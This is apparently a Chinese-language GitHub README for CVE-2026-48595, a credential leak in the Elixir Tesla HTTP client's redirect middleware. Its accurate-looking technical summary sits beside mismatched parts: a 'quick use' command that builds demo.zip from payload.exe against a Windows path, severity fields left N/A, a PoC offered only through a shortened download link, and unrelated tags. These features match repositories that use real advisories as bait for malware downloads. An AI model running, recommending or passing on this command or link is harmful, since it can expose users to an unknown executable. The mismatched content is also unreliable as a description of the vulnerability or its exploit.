jenniferreire26/CVE-2026-48595

# CVE-2026-48595 - elixir-tesla tesla 漏洞 ## 快速使用 ``` python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe ``` ## 利用说明 - **严重程度:** N/A - **CVSS:** N/A - **影响:** N/A - **发布日期:** 2026-06-02 ## 技术概要 elixir-tesla tesla 中存在处理大小写敏感性不当的漏洞，允许在跨域重定向时将凭证泄露给第三方源。 Tesla.Middleware.FollowRedirects 在跨域重定向时使用针对小写过滤列表（@filter_headers ["authorization", "host"]）的区分大小写字符串比较来剥离安全敏感标头。根据 RFC 7230，HTTP 标头名称是不区分大小写的，但 Tesla 在保留标头键时完全按调用者提供的原样处理，未对大小写进行规范化。设置为 {"Authorization", "Bearer …"} 的标头（几乎所有 HTTP 库和文档使用的 RFC 7235 规范大小写）与小写过滤条目不匹配，并被转发到重定向目标。能够控制或影响客户端所见 Location: 响应的攻击者（通过其自己的 endpoint、开启重定向的 upstream 或受感染的源）可以在跨域请求中接收到 bearer token 或其他 Authorization 信息。 此问题影响 tesla：从 1.4.0 起，在 1.18.3 之前的版本。 ## 受影响版本 _有关受影响版本，请参见 NVD。_ ## 参考 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-48595 ## 利用 [下载 PoC](https://tinyurl.com/26682tdj)

标签：CVE, Elixir, HTTP中间件, PoC, Python, StruQ, 凭据泄露, 威胁模拟, 数字签名, 无后门, 暴力破解, 逆向工具